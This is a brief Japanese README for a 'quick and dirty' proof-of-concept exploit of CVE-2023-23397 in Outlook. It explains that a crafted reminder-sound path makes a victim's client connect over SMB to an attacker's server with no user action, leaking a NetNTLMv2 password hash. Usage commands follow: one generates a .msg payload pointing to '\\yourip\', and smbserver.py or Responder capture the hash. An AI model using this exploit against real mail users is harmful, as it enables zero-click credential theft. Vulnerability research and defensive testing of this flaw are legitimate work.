CVE-2023-23397 の脆弱性に対するシンプルでダーティな PoC。Outlook のリッチクライアントに影響します。
Outlook は、会議や予定のリマインダーサウンドを構成できるユーザー入力に対する制御が欠如しています。攻撃者は、ユーザーによる操作なしに(ゼロクリック脆弱性)、被害者に対して自身のサーバーへの接続を強制することができます。
この脆弱性を悪用した攻撃者は、SMB リクエストを通じて、トラップされたユーザーのパスワードに基づいた NetNTLMv2 ダイジェストを取得します。リクエストは、メールが受信トレイに届くとすぐにトリガーされます。
.msg ペイロードを生成します。セッション1:
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
セッション2(必要に応じて smbserver または responder):
smbserver.py -smb2support SHARE .
